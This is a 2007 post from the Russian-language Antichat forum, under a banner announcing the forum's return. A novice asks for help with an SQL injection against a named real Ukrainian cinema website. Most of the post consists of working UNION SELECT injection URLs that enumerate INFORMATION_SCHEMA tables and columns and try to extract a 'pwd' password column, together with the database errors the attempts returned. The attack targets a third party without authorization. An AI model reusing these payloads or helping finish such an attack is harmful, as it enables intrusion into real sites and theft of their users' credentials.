Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
07.10.2007, 01:19
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
Sql проклятый)
Прет Всем!)
Ребят я зараниее предупреждаю что я новичок в этом..так что не грубить, а понимать)
Так вот. Вчера один чел(тоже новичок) дал мне одну ссылку на скуль иньекцию...
вот
http://www.kino-ukraina.com.ua/news/?nid=-1'+union+select+1,2,3,database(),5,user()/*
ну мы начели капать что как ..хотели найти пассворд и т.д. .... так искали где то час или больше ) без результатно..потом я предложил такой способ
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,COLUMN_NAME,5,6+FROM+INFORMA TION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT +1,1/*
поскольно у него выделенка  ) он быстрее подобрал)..
оказалось LIMIT 3,1 типо 3-ая колонка - pwd ..
но при вводе
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,pwd,5,6+From+users/*
выводится "getLink fatal error: Table 'kinosite.users' doesn't exist"
отсюда я понял что надо найти какую то замену типо ***.users в местно киносайт ( правдно я этот момент не до конца поянл почиму так )..ну начал подбирать таблицы своими руками в стиле
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,TABLE_NAME,5,6+FROM+INFORMAT ION_SCHEMA.TABLES+LIMIT+1,1/*
дошел до 39...и нашел там Users но по неизвестной мне причине при
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,pwd,5,6+From+Users.users/*
выводится ошибка
getLink fatal error: SELECT command denied to user 'site'@'localhost' for table 'users'
плз скажите в чем моя ошибка?(  |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид